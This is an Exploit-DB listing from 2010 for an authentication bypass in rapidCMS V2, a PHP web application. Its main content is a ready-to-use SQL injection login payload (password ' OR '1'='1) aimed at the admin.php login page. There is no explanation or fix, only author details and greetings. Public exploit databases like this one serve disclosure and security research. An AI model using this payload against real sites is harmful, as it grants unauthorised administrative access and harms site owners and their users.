rapidCMS 2.0 - Authentication Bypass

EDB-ID:

14410

CVE:

N/A

Author:

Mahjong

Type:

webapps

Platform:

PHP

Published:

2010-07-18

# Exploit Title: rapidCMS V2 Authentication Bypass
# Date: [18/07/2010]
# Author: Mahjong
# Software Link: www.rapidcms.de
# Version: V2
# Tested on: Linux
 
* Found by: Mahjong
* E-Mail: mahjong@phcn.ws
* Greetings: Puddy, Ancolon

----------------------------------------------------------    

Exploit Authentication Bypass:
 
User: something
Pass: ' OR '1'='1
  
----------------------------------------------------------
   
Demo :
http://site.tld/admin.php
  
----------------------------------------------------------